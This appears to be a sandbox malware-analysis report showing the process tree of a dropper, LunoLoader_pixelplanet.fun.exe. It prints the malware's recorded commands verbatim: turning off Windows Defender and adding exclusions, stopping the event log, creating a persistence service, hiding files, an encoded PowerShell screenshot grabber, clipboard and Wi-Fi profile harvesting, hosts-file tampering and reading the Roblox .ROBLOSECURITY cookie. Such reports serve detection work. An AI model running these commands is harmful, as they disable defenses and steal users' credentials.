PID 2564 wrote to memory of 2592	2564	cmd.exe	WinRuntime.exe
PID 2564 wrote to memory of 2592	2564	cmd.exe	WinRuntime.exe
PID 2360 wrote to memory of 3852	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 3852	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 2876	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 2876	2360	ss-a2.exe	cmd.exe
PID 4180 wrote to memory of 5048	4180	cmd.exe	powershell.exe
PID 4180 wrote to memory of 5048	4180	cmd.exe	powershell.exe
PID 3852 wrote to memory of 1504	3852	cmd.exe	tasklist.exe
PID 3852 wrote to memory of 1504	3852	cmd.exe	tasklist.exe
PID 2360 wrote to memory of 4388	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 4388	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 4636	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 4636	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 3540	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 3540	2360	ss-a2.exe	cmd.exe
PID 2292 wrote to memory of 2804	2292	cmd.exe	powershell.exe
PID 2292 wrote to memory of 2804	2292	cmd.exe	powershell.exe
PID 3776 wrote to memory of 2940	3776	cmd.exe	attrib.exe
PID 3776 wrote to memory of 2940	3776	cmd.exe	attrib.exe
PID 2360 wrote to memory of 3692	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 3692	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 2676	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 2676	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 4032	2360	ss-a2.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2940 attrib.exe
3688 attrib.exe
1440 attrib.exe

pid	process
2940	attrib.exe
3688	attrib.exe
1440	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe
"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4900
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1180
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3372
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2564
      - C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe
        
        "C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
        
        C:\Recovery\WindowsRE\wininit.exe
        
        "C:\Recovery\WindowsRE\wininit.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:32
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs"
        8⤵
        
        PID:2112
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3deb661f-065c-4bb4-a64e-9c6422f27542.vbs"
        8⤵
        
        PID:3920
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2040
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3564
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:236
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:224
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1672
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "XLZQHCLS"
      4⤵
      Launches sc.exe
      PID:3004
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4916
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:8
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "XLZQHCLS"
      4⤵
      Launches sc.exe
      PID:4168
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2292
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        Suspicious use of WriteProcessMemory
        
        PID:3776
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
        6⤵
        Views/modifies file attributes
        
        PID:2940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ .scr'"
        5⤵
        
        PID:436
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3852
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:2876
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:4388
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:4636
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3540
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3692
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2676
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:4032
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:3032
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:5108
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:2120
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:3288
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5092
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline"
        7⤵
        
        PID:2892
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5.tmp" "c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP"
        8⤵
        
        PID:4432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4432
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:2928
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5012
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:1532
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:4656
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:640
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4840
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4908
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:3112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4552
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4888
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:2904
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5012
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:4396
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3716
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:2012
